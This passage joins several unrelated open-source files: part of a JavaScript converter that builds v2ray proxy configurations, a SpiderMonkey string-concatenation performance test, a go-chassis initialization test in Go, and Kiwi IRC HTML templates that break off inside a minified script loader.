    switch (kv[0].trim()) {
      case 'address':
        address = value
        break
      case 'port':
        port = parseInt(value)
        break
      case 'user':
        user = value
        break
      case 'pass':
        pass = value
        break
    }
  }
  const server = { address: address, port: port }
  // Credentials are attached only when both halves are present.
  if (user.length > 0 && pass.length > 0) {
    server.users = [{ user: user, pass: pass }]
  }
  outbound.settings = { servers: [server] }
  return outbound
}
// Build a "dns" outbound. Recognized params: network, address, port —
// all written directly into ob.settings.
//
// Fix: the previous version also kept a never-populated local `settings`
// object and conditionally assigned it over ob.settings at the end; had it
// ever been populated it would have clobbered the parsed values. The dead
// variable and the clobbering branch are removed (no behavior change).
const dnsOutboundParser = (tag, params) => {
  let ob = {
    "protocol": "dns",
    "tag": tag,
    "settings": {}
  }
  params.forEach((param) => {
    const kv = param.trim().split('=')
    if (kv.length != 2) {
      return
    }
    switch (kv[0].trim()) {
      case 'network':
        ob.settings.network = kv[1].trim()
        break
      case 'address':
        ob.settings.address = kv[1].trim()
        break
      case 'port':
        ob.settings.port = parseInt(kv[1].trim())
        break
    }
  })
  return ob
}
// Parse a single `vmess1://` URL into a vmess outbound with streamSettings.
// URL anatomy: vmess1://<uuid>@<host>:<port><path>?<query>
// Query parameters select the transport (`network`), TLS, mux, sockopt and
// per-transport (ws / http / kcp / quic) options. Per-transport option
// objects are accumulated first and only attached for the selected network.
// Returns an Error object (not thrown) when more than one param is given.
const vmess1Parser = (tag, params) => {
  var ob = {
    "protocol": "vmess",
    "tag": tag,
    "settings": {
      "vnext": []
    },
    "streamSettings": {}
  }
  if (params.length > 1) {
    return new Error('invalid vmess1 parameters')
  }
  const url = new URL(params[0].trim())
  const uuid = url.username
  const address = url.hostname
  const port = url.port
  const path = url.pathname
  // Strip the leading '?' and undo percent-encoding before splitting.
  const query = decodeURIComponent(url.search.substr(1))
  // Option accumulators; each is attached to the outbound only when
  // non-empty and (for transports) only when its network is selected.
  const tlsSettings = {}
  const wsSettings = {}
  const httpSettings = {}
  const kcpSettings = {}
  const quicSettings = {}
  const mux = {}
  const sockopt = {}
  let header = null
  ob.settings.vnext.push({
    users: [{
      "id": uuid
    }],
    address: address,
    port: parseInt(port),
  })
  const parts = query.split('&')
  parts.forEach((q) => {
    const kv = q.split('=')
    switch (kv[0]) {
      case 'network':
        ob.streamSettings.network = kv[1]
        break
      case 'tls':
        if (kv[1] == 'true') {
          ob.streamSettings.security = 'tls'
        } else {
          ob.streamSettings.security = 'none'
        }
        break
      case 'tls.allowinsecure':
        if (kv[1] == 'true') {
          tlsSettings.allowInsecure = true
        } else {
          tlsSettings.allowInsecure = false
        }
        break
      case 'tls.servername':
        tlsSettings.serverName = kv[1]
        break
      case 'ws.host':
        // WebSocket Host header override (only when non-empty).
        let host = kv[1].trim()
        if (host.length != 0) {
          wsSettings.headers = { Host: host }
        }
        break
      case 'http.host':
        // Comma-separated list of HTTP/2 host names; blanks are dropped.
        let hosts = []
        kv[1].trim().split(',').forEach((h) => {
          if (h.trim().length != 0) {
            hosts.push(h.trim())
          }
        })
        if (hosts.length != 0) {
          httpSettings.host = hosts
        }
        break
      case 'mux':
        // A positive integer both enables mux and sets its concurrency.
        var v = parseInt(kv[1].trim())
        if (v > 0) {
          mux.enabled = true
          mux.concurrency = v
        }
        break
      case 'sockopt.tos':
        var v = parseInt(kv[1].trim())
        if (v > 0) {
          sockopt.tos = v
        }
        break
      case 'sockopt.tcpfastopen':
        if (kv[1] == 'true') {
          sockopt.tcpFastOpen = true
        } else {
          sockopt.tcpFastOpen = false
        }
        break
      // header type for both kcp and quic (maybe tcp later, not planed)
      case 'header':
        header = kv[1]
        break
      case 'kcp.mtu':
        kcpSettings.mtu = parseInt(kv[1].trim())
        break
      case 'kcp.tti':
        kcpSettings.tti = parseInt(kv[1].trim())
        break
      case 'kcp.uplinkcapacity':
        kcpSettings.uplinkCapacity = parseInt(kv[1].trim())
        break
      case 'kcp.downlinkcapacity':
        kcpSettings.downlinkCapacity = parseInt(kv[1].trim())
        break
      case 'kcp.congestion':
        if (kv[1] == 'true') {
          kcpSettings.congestion = true
        } else {
          kcpSettings.congestion = false
        }
        break
      case 'quic.security':
        quicSettings.security = kv[1].trim()
        break
      case 'quic.key':
        quicSettings.key = kv[1]
        break
    }
  })
  // TLS options only apply when TLS was actually selected above.
  if (Object.keys(tlsSettings).length != 0) {
    if (ob.streamSettings.security == 'tls') {
      ob.streamSettings.tlsSettings = tlsSettings
    }
  }
  if (Object.keys(sockopt).length != 0) {
    ob.streamSettings.sockopt = sockopt
  }
  // Attach only the option object matching the selected transport; the URL
  // path doubles as the ws/http path when present.
  switch (ob.streamSettings.network) {
    case 'ws':
      if (path.length != 0) {
        wsSettings.path = path
      }
      if (Object.keys(wsSettings).length != 0) {
        ob.streamSettings.wsSettings = wsSettings
      }
      break
    case 'http':
    case 'h2':
      if (path.length != 0) {
        httpSettings.path = path
      }
      if (Object.keys(httpSettings).length != 0) {
        ob.streamSettings.httpSettings = httpSettings
      }
      break
    case 'kcp':
    case 'mkcp':
      if (header) {
        kcpSettings.header = { type: header }
      }
      if (Object.keys(kcpSettings).length != 0) {
        ob.streamSettings.kcpSettings = kcpSettings
      }
      break
    case 'quic':
      if (header) {
        quicSettings.header = { type: header }
      }
      if (Object.keys(quicSettings).length != 0) {
        ob.streamSettings.quicSettings = quicSettings
      }
      break
  }
  if (Object.keys(mux).length != 0) {
    ob.mux = mux
  }
  return ob
}
const ssParser = (tag, params) => {
var ob = {
"protocol": "shadowsocks",
"tag": tag,
"settings": {
"servers": []
}
}
if (params.length > 1) {
return new Error('invalid shadowsocks parameters')
}
const url = new URL(params[0].trim())
const userInfo = url.username
const address = url.hostname
const port = url.port
var method
var password
if (url.password.length == 0) {
const parts = base64url.decode(decodeURIComponent(userInfo)).split(':')
if (parts.length != 2) {
return new Error('invalid user info')
}
method = parts[0]
password = parts[1]
} else {
method = url.username
password = url.password
}
ob.settings.servers.push({
method: method,
password: password,
address: address,
port: parseInt(port)
})
return ob
}
// Dispatch a "builtin" endpoint definition to the matching protocol parser.
// params[0] selects the protocol; the remaining params are forwarded.
// Returns undefined for unknown protocols (preserved behavior).
//
// Fix: `protocol` was assigned inside the switch expression without a
// declaration, leaking an implicit global (ReferenceError in strict mode).
const builtinParser = (tag, params) => {
  const protocol = params[0].trim()
  switch (protocol) {
    case 'freedom':
      return freedomOutboundParser(tag, params.slice(1, params.length))
    case 'blackhole':
      return blackholeOutboundParser(tag, params.slice(1, params.length))
    case 'dns':
      return dnsOutboundParser(tag, params.slice(1, params.length))
    case 'http':
    case 'socks':
      return httpAndSocksOutboundParser(protocol, tag, params.slice(1, params.length))
  }
}
// Registry mapping the parser name used in [Endpoint] lines
// (`tag, parserName, params...`) to its implementation.
const parsers = {
  builtin: builtinParser,
  vmess1: vmess1Parser,
  ss: ssParser,
}
// Build the outbounds array from [Endpoint] lines of the form
// `tag, parserName, param1, param2, ...`. Lines with fewer than two
// fields are ignored; unknown parser names are logged and skipped.
const constructOutbounds = (endpoint) => {
  const outbounds = []
  endpoint.forEach((line) => {
    const fields = line.trim().split(',')
    if (fields.length < 2) {
      return // next
    }
    const tag = fields[0].trim()
    const parserName = fields[1].trim()
    const parserFn = parsers[parserName]
    if (parserFn instanceof Function) {
      outbounds.push(parserFn(tag, fields.slice(2, fields.length)))
    } else {
      log.warn('parser not found: ', parserName)
    }
  })
  return outbounds
}
// Build the local system-proxy inbounds (SOCKS + HTTP on 127.0.0.1) when
// the feature is enabled; otherwise return an empty array.
const constructSystemInbounds = (opts) => {
  if (!opts || !opts.enabled) {
    return []
  }
  return [
    {
      "port": opts.socksPort,
      "protocol": "socks",
      "listen": "127.0.0.1",
      "settings": {
        "auth": "noauth",
        "udp": false
      }
    },
    {
      "port": opts.httpPort,
      "protocol": "http",
      "listen": "127.0.0.1",
      "settings": {}
    }
  ]
}
// Merge `inbounds` into config.inbounds. Existing inbounds listening on a
// port also used by a new inbound are dropped so the new ones win.
// Mutates and returns `config`. A no-op when `inbounds` is empty.
const appendInbounds = (config, inbounds) => {
  if (inbounds.length === 0) {
    return config
  }
  if (!config.inbounds) {
    config['inbounds'] = inbounds
    return config
  }
  const replacedPorts = inbounds.map((ib) => ib.port)
  config.inbounds = config.inbounds.filter((ib) => !replacedPorts.includes(ib.port))
  config.inbounds.push(...inbounds)
  return config
}
// Assemble the final v2ray JSON config from a conf file's sections.
// The [Dns] section feeds both routing (hijack rule) and the dns object.
// Sections that come out empty are pruned from the result.
const constructJson = (conf, subConf) => {
  const dnsConf = getLinesBySection(conf, 'Dns')
  const routing = constructRouting(
    getLinesBySection(conf, 'Routing'),
    getLinesBySection(conf, 'RoutingDomainStrategy'),
    getLinesBySection(conf, 'EndpointGroup'),
    getLinesBySection(conf, 'RoutingRule'),
    dnsConf,
    subConf
  )
  const dns = constructDns(
    dnsConf,
    getLinesBySection(conf, 'DnsServer'),
    getLinesBySection(conf, 'DnsRule'),
    getLinesBySection(conf, 'DnsHost'),
    getLinesBySection(conf, 'DnsClientIp')
  )
  const log = constructLog(getLinesBySection(conf, 'Log'))
  const outbounds = constructOutbounds(getLinesBySection(conf, 'Endpoint'))
  const result = {
    log: log,
    dns: dns,
    outbounds: outbounds,
    routing: routing
  }
  // Drop members that ended up with no content at all.
  Object.keys(result).forEach((prop) => {
    if (Object.entries(result[prop]).length === 0) {
      delete result[prop]
    }
  })
  return result
}
// Public API: section extraction, per-section constructors, and helpers
// for composing/patching a complete v2ray JSON config.
module.exports = {
  getLinesBySection,
  constructRouting,
  constructDns,
  constructLog,
  constructOutbounds,
  constructJson,
  constructSystemInbounds,
  appendInbounds,
  removeJsonComments,
  readSubConfigBySection
}
// CLI mode: when run directly, read a conf file from stdin and print the
// generated v2ray JSON config to stdout.
if (typeof require !== 'undefined' && require.main === module) {
  const readline = require('readline')
  const rl = readline.createInterface({
    input: process.stdin,
    output: process.stdout,
    terminal: false
  })
  const inputLines = []
  rl.on('line', (line) => inputLines.push(line))
  rl.on('close', () => {
    const json = constructJson(inputLines.join('\n'))
    console.log(JSON.stringify(json, null, 2))
  })
}
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is JavaScript Engine testing utilities.
*
* The Initial Developer of the Original Code is
* Mozilla Foundation.
* Portions created by the Initial Developer are Copyright (C) 2005
* the Initial Developer. All Rights Reserved.
*
* Contributor(s): [email protected]
* Bob Clary <[email protected]>
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
//-----------------------------------------------------------------------------
// Test driver for bug 56940. printBugNumber/printStatus/BigO/reportCompare
// and gc are SpiderMonkey test-harness globals.
var BUGNUMBER = 56940;
var summary = 'String concat should not be O(N**2)';
var actual = '';
var expect = '';
printBugNumber(BUGNUMBER);
printStatus (summary);
// Sample concat timings at sizes 1000..10000 and fit a complexity order.
var data = {X:[], Y:[]};
for (var size = 1000; size <= 10000; size += 1000)
{
  data.X.push(size);
  data.Y.push(concat(size));
  gc();
}
var order = BigO(data);
// Log the (size, elapsed-ms) samples for diagnosis.
var msg = '';
for (var p = 0; p < data.X.length; p++)
{
  msg += '(' + data.X[p] + ', ' + data.Y[p] + '); ';
}
printStatus(msg);
printStatus('Order: ' + order);
// Pass iff the measured growth is sub-quadratic.
reportCompare(true, order < 2, 'BigO ' + order + ' < 2');
// Time (in ms) how long it takes to build a string by repeated `+=`
// concatenation: `size` iterations of six appends each. Used above to
// check that string concatenation does not degrade to O(N**2).
function concat(size)
{
  var result = '';
  var chunkA = 'Mozilla Mozilla Mozilla Mozilla ';
  var chunkB = 'goober ';
  var started = new Date();
  for (var i = 0; i < size; i++)
  {
    result += chunkA + chunkB + chunkA + chunkB + chunkA + chunkB;
  }
  return new Date() - started;
}
| {
"pile_set_name": "Github"
} |
package chassis_test
import (
"os"
"path/filepath"
"reflect"
"testing"
"github.com/go-chassis/go-chassis/v2"
"github.com/go-chassis/go-chassis/v2/core/config"
"github.com/go-chassis/go-chassis/v2/core/lager"
"github.com/go-chassis/go-chassis/v2/core/server"
"github.com/go-chassis/go-chassis/v2/pkg/util/fileutil"
"github.com/go-chassis/go-chassis/v2/core/config/model"
"github.com/stretchr/testify/assert"
"syscall"
)
// Provider is the service role name used by the test fixtures in this file.
const (
	Provider = "provider"
)
// TestInit exercises the full chassis bootstrap: it writes a complete
// chassis.yaml and microservice.yaml under a temporary CHASSIS_HOME,
// initializes logging/config, installs shutdown hooks, runs chassis.Init,
// and then verifies the "rest" server was created with the expected chain.
func TestInit(t *testing.T) {
	// Clear the umask so the 0700 file/dir modes below take effect exactly.
	mask := syscall.Umask(0)
	defer syscall.Umask(mask)
	t.Log("Testing Chassis Init function")
	// Point chassis at a scratch home dir and create its conf directory.
	os.Setenv("CHASSIS_HOME", filepath.Join(os.Getenv("GOPATH"), "test", "chassisInit"))
	err := os.MkdirAll(fileutil.GetConfDir(), 0700)
	assert.NoError(t, err)
	globalDefFile, err := os.OpenFile(fileutil.GlobalConfigPath(), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700)
	defer globalDefFile.Close()
	// Write the global definition (chassis.yaml) fixture.
	// NOTE(review): YAML nesting below reconstructed to conventional
	// two-space indentation — confirm against the original fixture.
	_, err = globalDefFile.WriteString(`---
controlPanel:
  infra: istio
  settings:
    Address: xxx
cse:
  flowcontrol:
    Consumer:
      qps:
        enabled: true
        limit:
          Server.EmployServer: 100
  loadbalance:
    strategy:
      name: RoundRobin
    retryEnabled: false
    retryOnNext: 2
    retryOnSame: 3
    backoff:
      kind: constant
      minMs: 200
      maxMs: 400
servicecomb:
  registry:
    type: servicecenter
    scope: full
    address: http://127.0.0.1:30100
    refreshInterval : 30s
    watch: true
    register: reg
  protocols:
    rest:
      listenAddress: 127.0.0.1:5001
  handler:
    chain:
      Consumer:
        rest: bizkeeper-consumer, loadbalance
      Provider:
        rest: bizkeeper-provider
ssl:
  registry.consumer.cipherPlugin: default
  registry.consumer.verifyPeer: false
  registry.consumer.cipherSuits: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  registry.consumer.protocol: TLSv1.2
  registry.consumer.caFile:
  registry.consumer.certFile:
  registry.consumer.keyFile:
  registry.consumer.certPwdFile:
`)
	assert.NoError(t, err)
	// Write the microservice definition (microservice.yaml) fixture.
	msDefFile, err := os.OpenFile(fileutil.MicroServiceConfigPath(), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700)
	assert.NoError(t, err)
	defer msDefFile.Close()
	_, err = msDefFile.WriteString(`---
#微服务的私有属性
servicecomb:
  service:
    name: nodejs2
    version: 0.1
    properties:
      allowCrossApp: true
    instanceProperties:
      a: s
      p: s
`)
	lager.Init(&lager.Options{
		LoggerLevel: "INFO",
	})
	config.GlobalDefinition = &model.GlobalCfg{}
	config.Init()
	config.GlobalDefinition.ServiceComb.Registry.AutoRegister = "abc"
	chassis.SetDefaultConsumerChains(nil)
	chassis.SetDefaultProviderChains(nil)
	// Install signal hijacking plus pre/post shutdown hooks before Init.
	sigs := []os.Signal{syscall.SIGINT, syscall.SIGHUP, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGILL, syscall.SIGTRAP, syscall.SIGABRT}
	chassis.HajackSignal(sigs...)
	chassis.InstalPreShutdown("pre_test", func(os.Signal) {
		t.Log("pre_shutdown_test")
	})
	chassis.InstalPostShutdown("post_test", func(os.Signal) {
		t.Log("post_shutdown_test")
	})
	chassis.HajackGracefulShutdown(chassis.GracefulShutdown)
	err = chassis.Init()
	assert.NoError(t, err)
	chassis.RegisterSchema("rest", "str")
	restServer, err := server.GetServer("rest")
	assert.NotNil(t, restServer)
	assert.NoError(t, err)
	// Reach into the unexported opts field to confirm the chain name that
	// Init wired into the rest server.
	v := reflect.ValueOf(restServer)
	opts := reflect.Indirect(v).FieldByName("opts")
	chainName := opts.FieldByName("ChainName")
	assert.Equal(t, "rest", chainName.String())
}
// TestInitError points CHASSIS_HOME at an example directory that lacks the
// generated config files, preparing the error path; it only sets up the
// environment and logging here.
func TestInitError(t *testing.T) {
	t.Log("Testing chassis Init function for errors")
	clientDir := filepath.Join(os.Getenv("GOPATH"), "src", "github.com", "go-chassis", "go-chassis", "examples", "communication/client")
	os.Setenv("CHASSIS_HOME", clientDir)
	lager.Init(&lager.Options{LoggerLevel: "INFO"})
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="referrer" content="origin-when-cross-origin">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<base target="_blank">
<title> Kiwi IRC </title>
<link rel="shortcut icon" href="<%base_path%>/assets/img/favicon.ico">
<link rel="stylesheet" type="text/css" href="<%base_path%>/assets/css/style.css?t=<%build_time%>" />
<link rel="stylesheet" type="text/css" href="<%base_path%>/assets/css/font-awesome.min.css" />
</head>
<body>
<script type="text/html" id="tmpl_application">
<div id="kiwi" class="theme_relaxed">
<div class="toolbar">
<div class="app_tools">
<ul class="main">
<li class="settings"><i class="fa fa-cogs" title="Settings"></i></li>
<li class="startup"><i class="fa fa-home" title="Home"></i></li>
<li><a href="https://kiwiirc.com/" target="_blank"><img src="<%base_path%>/assets/img/ico.png" alt="KiwiIRC" title="KiwiIRC" /></a></li>
</ul>
</div>
<div class="tabs"></div>
<div class="topic">
<div contenteditable="true"></div>
</div>
<div class="status_message"></div>
</div>
<div class="memberlists_resize_handle"></div>
<div class="panels">
<div class="panel_container container1"></div>
</div>
<div class="right_bar disabled">
<div class="right-bar-toggle"><i class=""></i></div>
<div class="right-bar-content">
<div class="channel_tools">
<i class="fa fa-info-circle channel_info" title="Channel Info"></i>
<i class="fa fa-sign-out channel_part" title="Leave Channel"></i>
<i class="fa fa-angle-double-right right-bar-toggle-inner" title="Hide"></i>
</div>
<div class="memberlists"></div>
</div>
</div>
<div class="controlbox">
<div class="autocomplete">
<div class="autocomplete-header">
<span class="autocomplete-header-label">People or channels</span>
<span class="autocomplete-header-help">
<strong>tab</strong> or <strong>↑</strong> <strong>↓</strong> to navigate <strong class="left_margin">↵</strong> to select <strong class="left_margin">esc</strong> to dismiss</span>
</div>
</div>
<div class="input">
<span class="nick"> </span>
<div class="input_wrap"><textarea class="inp" wrap="off"></textarea></div>
<div class="input_tools"></div>
</div>
</div>
</div>
</script>
<script type="text/html" id="tmpl_channel_info">
<div class="channel_info">
<b class="channel_url"><a href=""></a></b>
<form>
<div class="control-group channel_info_modes">
<label>
<input type="checkbox" name="channel_mute" class="channel-mode" data-mode="m" />
Moderated chat
</label>
<label>
<input type="checkbox" name="channel_invite" class="channel-mode" data-mode="i" />
Invite only
</label>
<label>
<input type="checkbox" name="channel_topic" class="channel-mode" data-mode="t" />
Only operators can change the topic
</label>
<label>
<input type="checkbox" name="channel_external_messages" class="channel-mode" data-mode="n" />
Block messages from outside this channel
</label>
</div>
<div class="control-group">
<label>
Password
<input type="text" name="channel_key" class="channel-mode" data-mode="k" />
</label>
</div>
<div class="control-group channel-banlist">
<button class="toggle_banlist">Toggle banlist</button> <span class="banlist-status"></span>
<table>
<thead>
<tr>
<td>Ban Mask</td>
<td>Added By</td>
<td>Date Added</td>
<td></td>
</tr>
</thead>
<tbody>
</tbody>
</table>
</div>
</form>
</div>
</script>
<script type="text/html" id="tmpl_userbox">
<div class="userbox">
<a class="close_menu if_op op"><i class="fa fa-star"></i><%= op %></a>
<a class="close_menu if_op deop"><i class="fa fa-star-o"></i><%= de_op %></a>
<a class="close_menu if_op voice"><i class="fa fa-volume-up"></i><%= voice %></a>
<a class="close_menu if_op devoice"><i class="fa fa-volume-off"></i><%= de_voice %></a>
<a class="close_menu if_op kick"><i class="fa fa-times"></i><%= kick %></a>
<a class="close_menu if_op ban"><i class="fa fa-ban"></i><%= ban %></a>
<a class="close_menu query"><i class="fa fa-comment"></i><%= message %></a>
<a class="close_menu info"><i class="fa fa-info-circle"></i><%= info %></a>
<a class="close_menu ignore"><label><i><input type="checkbox" /></i><%= ignore %></label></a>
</div>
</script>
<script type="text/html" id="tmpl_nickchange">
<form class="nickchange">
<label for="nickchange"><%= new_nick %>:</label> <input type="text" mozactionhint="done" autocomplete="off" spellcheck="false"/> <button><%= change %></button> <a class="cancel"><%= cancel %></a>
</form>
</script>
<script type="text/html" id="tmpl_new_connection_info">
<div style="margin:1em 20px;">
<img src="<%base_path%>/assets/img/ico.png" alt="KiwiIRC Logo" title="Kiwi IRC" style="display:block; margin:0 auto;"/> <br />
<p style="font-style:italic;">A <strong>hand-crafted IRC client</strong> that you can enjoy. Designed to be used <strong>easily</strong> and <strong>freely</strong>.</p>
<p style="font-size:0.9em;margin-top:2em;">Peek at the <a href="https://www.kiwiirc.com/">Kiwi IRC homepage</a> for more information or to find out how to embed it on your own website. Looking for source code? Try the <a href="http://github.com/prawnsalad/KiwiIRC/">GitHub</a> page. This network of people may not be associated with Kiwi IRC itself.</p>
</div>
</script>
<script type="text/html" id="tmpl_server_select">
<div class="server_select">
<div class="side_panel" style="position:absolute;top:0px;left:320px;">
<div class="content" style="position:relative;width:300px;">
</div>
</div>
<div class="server_details" style="position:relative;width:320px;">
<div class="status"><%= think_nick %></div>
<form>
<div class="basic">
<table>
<tr class="nick">
<td><label for="server_select_nick"><%= nickname %></label></td>
<td><input type="text" class="nick" id="server_select_nick"></td>
</tr>
<tr class="have_pass">
<td colspan="2">
<label for="server_select_show_pass"><%= have_password %></label> <input type="checkbox" id="server_select_show_pass" style="width:auto;" />
</td>
</tr>
<tr class="pass">
<td><label for="server_select_password"><%= password %></label></td>
<td><input type="password" class="password" id="server_select_password"></td>
</tr>
<tr class="channel">
<td><label for="server_select_channel"><%= channel %></label></td>
<td>
<div style="position:relative;">
<input type="text" class="channel" id="server_select_channel">
<i class="fa fa-key" title="<%= channel_key %>"></i>
</div>
</td>
</tr>
<tr class="have_key">
<td colspan="2">
<label for="server_select_show_channel_key"><%= require_key %></label> <input type="checkbox" id="server_select_show_channel_key" style="width:auto;" />
</td>
</tr>
<tr class="key">
<td><label for="server_select_channel_key"><%= key %></label></td>
<td><input type="password" class="channel_key" id="server_select_channel_key"></td>
</tr>
<tr class="start">
<td></td>
<td><button type="submit"><%= start %></button></td>
</tr>
</table>
<a href="" onclick="return false;" class="show_more"><%= server_network %> <i class="fa fa-caret-down"></i></a>
</div>
<div class="more">
<table>
<tr class="server">
<td><label for="server_select_server"><%= server %></label></td>
<td><input type="text" class="server" id="server_select_server"></td>
</tr>
<tr class="port">
<td><label for="server_select_port"><%= port %></label></td>
<td><input type="text" class="port" id="server_select_port"></td>
</tr>
<tr class="ssl">
<td><label for="server_select_ssl">SSL</label></td>
<td><input type="checkbox" class="ssl" id="server_select_ssl"></td>
</tr>
</table>
</div>
</form>
<a class="kiwi_logo" href="https://kiwiirc.com/" target="_blank">
<h1><span><%= powered_by %></span> <img src="<%base_path%>/assets/img/ico.png" alt="KiwiIRC Logo" title="Kiwi IRC" /></h1>
</a>
</div>
</div>
</script>
<script type="text/html" id="tmpl_theme_thumbnail">
<a class="thumbnail" data-setting="theme" data-value="<%= name.toLowerCase() %>" href="#">
<div class="thumbnail_wrapper"><div class="theme_color" style="background-color: <%= thumbnail_colour %>;"></div></div>
<div class="caption"><u><%= name %></u></div>
</a>
</script>
<script type="text/html" id="tmpl_applet_settings">
<div class="settings_container">
<div class="settings-category-list">
<a class="show-category show-category-appearance" data-category="appearance"><%= appearance %></a>
<a class="show-category show-category-messages" data-category="messages"><%= messages %></a>
</div>
<form class="settings-category settings-category-messages">
<h5><%= messages %></h5>
<section>
<h6><%= chat_messages %></h6>
<div class="control-group">
<div class="checkbox">
<label>
<input data-setting="show_timestamps" type="checkbox">
<%= timestamps %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="use_24_hour_timestamps" type="checkbox">
<%= timestamp_24 %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="show_emoticons" type="checkbox">
<%= emoticons %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="ignore_new_queries" type="checkbox">
<%= queries %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="show_autocomplete_slideout" type="checkbox">
<%= autocomplete_slideout %>
</label>
</div>
<div>
<label>
<input data-setting="scrollback" class="input-small" type="text" size="4" pattern="\d*">
<span><%= scroll_history %></span>
</label>
</div>
</div>
</section>
<section>
<h6><%= alerts_notifications %></h6>
<div class="control-group">
<div class="checkbox">
<label>
<input data-setting="show_joins_parts" type="checkbox">
<%= join_part %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="count_all_activity" type="checkbox">
<%= count_all_activity %>
</label>
</div>
<div class="checkbox">
<label>
<input data-setting="mute_sounds" type="checkbox">
<%= mute %>
</label>
</div>
<div>
<label>
<div><%= custom_highlights %></div>
<input data-setting="custom_highlights" class="input-small" type="text" size="20">
</label>
</div>
</div>
</section>
</form>
<form class="settings-category settings-category-appearance">
<h5><%= appearance %></h5>
<section>
<h6><%= theme %></h6>
<div class="control-group">
<div class="thumbnails">
<% _.forEach(theme_thumbnails, function(thumbnail) { %>
<%= thumbnail %>
<% }); %>
</div>
</div>
</section>
<section>
<h6><%= channels %></h6>
<div class="control-group">
<div class="radio">
<label>
<input type="radio" name="channel_list_style" data-setting="channel_list_style" value="tabs">
<%= tabs %>
</label>
</div>
<div class="radio">
<label>
<input type="radio" name="channel_list_style" data-setting="channel_list_style" value="list">
<%= list %><small class="text-muted">(<%= large_amounts_of_chans %>)</small>
</label>
</div>
<label>
<input data-setting="scrollback" class="input-small" type="text" size="4" pattern="\d*">
<span><%= scroll_history %></span>
</label>
</div>
</section>
<section class="language">
<h6><%= language %></h6>
<div class="control-group">
<select data-setting="locale">
<option value=""></option>
<% _.forEach(languages, function(lang) { %>
<option value="<%= lang.tag %>"><%= lang.language %></option>
<% }); %>
</select>
<br>
<small><%= locale_restart_needed %></small>
</div>
</section>
<section class="protocol_handler">
<h6><%= default_client %></h6>
<div class="control-group">
<button class="register_protocol"><%= make_default %></button>
<br>
<small><%= default_note %></small>
</div>
</section>
<section class="notification_enabler">
<h6><%= html5_notifications %></h6>
<div class="control-group">
<button class="enable_notifications"><%= enable_notifications %></button>
</div>
</section>
</form>
</div>
</script>
<script type="text/html" id="tmpl_channel_list">
<div class="applet_chanlist">
<table>
<thead style="font-weight: bold;">
<tr>
<td><a class="channel_name_title"><%= channel_name %></a></td>
<td><a class="users_title"><%= users %></a></td>
<td style="padding-left: 2em;"><%= topic %></td>
</tr>
</thead>
<tbody style="vertical-align: top;">
</tbody>
</table>
</div>
</script>
<script type="text/html" id="tmpl_script_editor">
<div style="height:100%;">
<style>
#kiwi .script_editor .se_toolbar { padding: 10px 20px; }
#kiwi .script_editor .se_toolbar span.status { margin-left:2em; font-style:italic; }
#kiwi .script_editor .se_toolbar button { height:30px; padding:0 1em; }
#kiwi .script_editor .se_toolbar button i { font-size:1.2em; margin-left:3px; }
</style>
<div class="script_editor" style="height:100%; position:relative;">
<div class="se_toolbar"><button class="btn_save"><%= save %><i class="fa fa-floppy-o"></i></button><span class="status"></span></div>
<div class="editor" style="position:absolute;top:50px;bottom:0px;left:0px;right:0px;"></div>
</div>
</div>
</script>
<script type="text/html" id="tmpl_notifications">
<div class="notification-inner">
<i class="fa fa-times close"></i>
<h6></h6>
<div class="content"></div>
</div>
</script>
<script src="<%base_path%>/assets/libs/jquery-1.11.1.min.js"></script>
<script>
/* Script loader (https://github.com/ded/script.js) */
(function(a,b,c){typeof c["module"]!="undefined"&&c.module.exports?c.module.exports=b():typeof c["define"]!="undefined"&&c["define"]=="function"&&c.define.amd?define(a,b):c[a]=b()})("$script",function(){function p(a,b){for(var c=0,d=a.length;c<d;++c)if(!b(a[c]))return j;return 1}function q(a,b){p(a,function(a){return!b(a)})}function r(a,b,i){function o(a){return a.call?a():d[a]}function t(){if(!--n){d[m]=1,l&&l();for(var a in f)p(a.split("|"),o)&&!q(f[a],o)&&(f[a]=[])}}a=a[k]?a:[a];var j=b&&b.call,l=j?b:i,m=j?a.join(""):b,n=a.length;return setTimeout(function(){q(a,function(a){if(h[a])return m&&(e[m]=1),h[a]==2&&t();h[a]=1,m&&(e[m]=1),s(!c.test(a)&&g?g+a+".js":a,t)})},0),r}function s(c,d){var e=a.createElement("script"),f=j;e.onload=e.onerror=e[o]=function(){if(e[m]&&!/^c|loade/.test(e[m])||f)return;e.onload=e[o]=null,f=1,h[c]=2,d()},e.async=1,e.src=c,b.insertBefore(e,b.firstChild)}var 